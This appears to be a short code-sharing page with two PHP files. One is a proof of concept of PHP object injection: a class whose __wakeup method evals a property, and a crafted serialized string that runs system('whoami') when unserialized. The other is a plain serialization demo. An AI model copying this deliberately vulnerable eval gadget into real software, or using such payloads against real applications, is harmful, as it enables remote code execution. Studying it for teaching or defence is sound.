MohitDabas · June 15, 2020 03:54
diff --git a/phpserializeattack.php b/phpserializeattack.php
 <?php
 class PHPObjectInjection{
        public $inject;
 
        function __wakeup(){
           if(isset($this->inject)){
                eval($this->inject);
            }
        }
     
 }

 $a= new PHPObjectInjection();
 $b=serialize($a);
 echo $b;
 $b="O:18:\"PHPObjectInjection\":1:{s:6:\"inject\";s:17:\"system('whoami');\";}";
 $c=unserialize($b);
 print_r($c);

diff --git a/simpledesserphp.php b/simpledesserphp.php
 <?php
 class PHPObjectInjection{
        public $inject;
     
 }
 $a= new PHPObjectInjection();
 $b=serialize($a);
 echo $b;
 echo "\n";
 $c=unserialize($b);
 print_r($c);
	<?php
	class PHPObjectInjection{
	public $inject;

	function __wakeup(){
	if(isset($this->inject)){
	eval($this->inject);
	}
	}

	}

	$a= new PHPObjectInjection();
	$b=serialize($a);
	echo $b;
	$b="O:18:\"PHPObjectInjection\":1:{s:6:\"inject\";s:17:\"system('whoami');\";}";
	$c=unserialize($b);
	print_r($c);